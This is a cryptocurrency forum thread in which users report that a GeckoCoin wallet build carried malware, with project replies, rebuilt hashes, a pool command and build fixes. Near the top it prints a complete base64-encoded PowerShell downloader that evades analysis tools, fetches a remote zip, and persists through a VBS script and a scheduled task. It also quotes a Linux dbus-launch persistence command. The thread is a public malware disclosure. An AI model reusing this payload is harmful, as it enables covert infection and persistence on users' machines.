AZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A

That is a base64 encoded line, that you can decode easily to see for your selves. On linux you can run the below line, or you can use something like https://www.base64decode.org/, just set the source character set to auto-detect.

Code:

echo SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A | base64 -d

https://www.virustotal.com/gui/file/f41649a4cb6f167c66ef4e2252c3a50f2b3b8a8d6818580ca0e7d6dec2142ac9/behavior
https://www.virustotal.com/gui/file/7d8bb86d079e81b143f82ead0165f92170795228c06fcf1317e6d99972d90256/behavior

Not only is the windows wallet malicious, so are linux precompiled binares that drop files in /var/lib/fwupd/gnupg/ and /root/.dbus/session-bus/ and then try to set auto execute using /usr/bin/dbus-launch dbus-launch --autolaunch a39eb3ed78b7401fb6809ed0c562a5b1 --binary-syntax --close-stderr


So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet.
Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.

[Gecko_mn]

So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet.
Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.

Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again!


We asked for many pools, but did not even try to climb into your fraudulent pool
https://mining4people.com

[Gecko_mn]

WARNING
https://mining4people.com
SCAM

[Gecko_mn]

Dear traders, users.

Download wallets only from official sources.

Source: https://gecko.mn/ 📢

[RobbK]

Once the wallet issue is fixed, then you upload the updated ver to github where it's supposed to be ( zip fie and correct hashes ). Good to go. The virustotal website is not lying to anyone. Anyone can use it and cross check the results. The bootstrap was taken down. Must of been a reason that it was. I don't see a problem as long as the scan is clean. Avg free antivirus is also stopping the CMD and powershell from executing. If the issue is on the blockchain and syncing then maybe more of problem. Clean it and post the updated wallet to Github zipped with hashes. Link to it from your website. No reason to be upset. If you think Virustotal is in the wrong, Avg is in the wrong. Reach out to them. Stop banning people from your discord who have concerns. That's not a good route to take.

[Gecko_mn]

Check it https://discord.com/channels/987986521091092500/1021486002843426927/1084568935111852132 (trust)

Babacoin confirms that everything is in order with our wallet. You can create a separate virtual machine and check the wallet startup and the presence of extra files.

[RobbK]

The Virustotal website is not going away. If your results are good - then that is trust. All the scans can be crossed checked by each user. Clean up your wallet and blockchain so it passes please.

[furcalor]

Where did you get this powershell script from, there is nothing like this in the GEC wallet) Check again!

Since you asked for video proof earlier, see here: https://youtu.be/oy7Ha-WkXVo
As you can see in the video the wallet is downloaded from the official website and the send to virustotal. After which a rescan is ran on the file since the hash matches the earlier hash.
AV still reports the wallet as containing Trojan-Downloader.Win64.Alien.acs and the behaviour tab still shows the powershell. Ofcourse now it does fail to download the .zip which is a good thing.

I don't know if you are the person building and publishing the wallet files. If your not, then who ever is doing that for you has taken an advantage of it.
I am glad to see that the bootstrap.zip file has been removed from update.airdroper.net so users no longer get that downloaded.

[Gecko_mn]

Please check again, we compiled the wallet again and replaced it until we understand what the problem is
md5 hash 77156fdcd419ec8b2fbff2927edb1352  geckocoin-qt.exe
https://www.virustotal.com/gui/file/ebe9d33f8ad0aad6f09eecd7cd8c336b41a75ca632b04ad852cb3078e3f836a9/detection

[furcalor]

Looking much better, would still advice caution as with any file downloaded from the internet.

Based on the latest wallet virustotal scans and behavior checks, no more commands are executed.
All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.

Edit to add,
Only thing that really is a bit wierd is the file
C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000
But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox.
Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.

Is it possible your build environment was compromised when building the previous wallets?

[Gecko_mn]

Looking much better, would still advice caution as with any file downloaded from the internet.

Based on the latest wallet virustotal scans and behavior checks, no more commands are executed.
All the alerts reference either cryptowallets or cryptominers which for coin wallets is pretty normal.

Edit to add,
Only thing that really is a bit wierd is the file
C:\Sysmon\438274944D21C3590AB2F6C5A34D5933B808ACB6409037FFE5B95B31EF18E8BDCFC6B5E6A0049489ADC5CECAFC7F95524157170C3CDA66F72AD85350D09F0476432071D000000000000000000000000000000000
But I think this is a Sysinternals sandbox artifact as I did not see that in my own sandbox.
Also not entirely sure why it needs to query a list of all running processes but maybe that's due to some dependency.

Is it possible your build environment was compromised when building the previous wallets?

We are dealing with the situation, we have installed wallets of other cryptocurrency projects.

[Gecko_mn]

We did not find the problem, but just in case, we reinstalled the server (made a backup) and restarted the site with all the necessary services. We will also host the wallet on Github and set the MD5 hash of the wallet for validation.

[Gecko_mn]

Wallets updated with links to VirusTotal and MD5 hashes.

md5 hash 77156fdcd419ec8b2fbff2927edb1352 geckocoin-qt.exe
https://www.virustotal.com/gui/file/ebe9d33f8ad0aad6f09eecd7cd8c336b41a75ca632b04ad852cb3078e3f836a9/detection

md5 hash 134ff49c22e4a6f183daf85976028429 geckocoin-qt
https://www.virustotal.com/gui/file/20b7bf877dd008135cee4a1c61bc59c4e6d836cb92a531fdd979441e38c4fe93/detection

md5 hash 65623d374b93cc8d31aba86766ec8e3a geckocoind
https://www.virustotal.com/gui/file/cd3ed010d5d591f24b7b7b452b9ce4b412fb11b0ae650cdd4bddea60597b4ac2?nocache=1

md5 hash e0bc2ba1b500e6713bd865287d6f414c geckocoin-cli
https://www.virustotal.com/gui/file/bca53461f3592fc3abae4eac5fc8155c24e390cc630a5d1eb27d2ba1cf16ed88?nocache=1

[Bivis777]

I lost so much money on masternodes that I'm already scared

[Gecko_mn]

I lost so much money on masternodes that I'm already scared

With us you will not lose money.
We don't really care about the masternode process. We have a different mission.
We make games, and the masternode is a nice bonus.

[Gecko_mn]

Hello guys, haven't seen each other for a long time, I'm glad to announce that we have done a lot in the next game, today we were able to make friends with the wallet with the game payment system.
As soon as there is news, I will definitely let you know.

[Gecko_mn]

If you have not yet subscribed to us on Twitter, do it right now, now all news will be published only there.
https://twitter.com/geckocoin_mn

[preda]

I lost so much money on masternodes that I'm already scared

With us you will not lose money.
We don't really care about the masternode process. We have a different mission.
We make games, and the masternode is a nice bonus.

info about masternode? how many coin require? apr%? there is a guide?

[mr-miner]

https://mr-miner.org/ has successfully added GeckoCoin GEC
Join now!
Fees Share/Solo: 0.5%
Min Payout: 1 GEC
DIscord: https://discord.gg/CAsyyqFpjQ
Paymentintervall every 30 mins

Miner command line:

-a gr -o stratum+tcp://stratum.mr-miner.org:5946 -u WALLET_ADDRESS.WORKER_NAME -p c=GEC

Cheers!

[mameex]

Is there any working block explorer available for public use?

Because geckocoin binaries for Ubuntu 20 doesn't work for Ubuntu 22 I made a guide/solution on how to build them from source.

Code:

wget https://github.com/dashpay/bls-signatures/archive/v20181101.zip
unzip v20181101.zip
cd bls-signatures-20181101
mkdir build
cmake ../
cd ..

repair file:
bls-signatures-20181101/contrib/relic/src/md/blake2.h

line 64 replace with:

Code:

typedef struct ALIGNME( 64 ) __blake2s_state

line 89 replace with:

Code:

typedef struct ALIGNME( 64 ) __blake2b_state

repair file:
bls-signatures-20181101/contrib/catch/catch.hpp

replace:

Code:

static constexpr std::size_t sigStackSize = 32768 >= MINSIGSTKSZ ? 32768 : MINSIGSTKSZ;

with:

Code:

static constexpr std::size_t sigStackSize = 32768;

go back to build folder.
bls-signatures-20181101/build

Code:

make
sudo make install

download geckcoin source: https://github.com/GeckoProjectMN/GeckoProject/archive/refs/tags/v.1.1.tar.gz

repair file:
src/httpserver.cpp
add at line 32:

Code:

#include <deque>

repair file:
src/validation.cpp
add at line 46:

Code:

#include <boost/bind.hpp>

repair file:
src/validationinterface.cpp
add at line 7:

Code:

#include <boost/bind.hpp>

Now you can finally build binaries for Ubuntu 22.04.

[elmo40]

Another dead GR coin... go figure.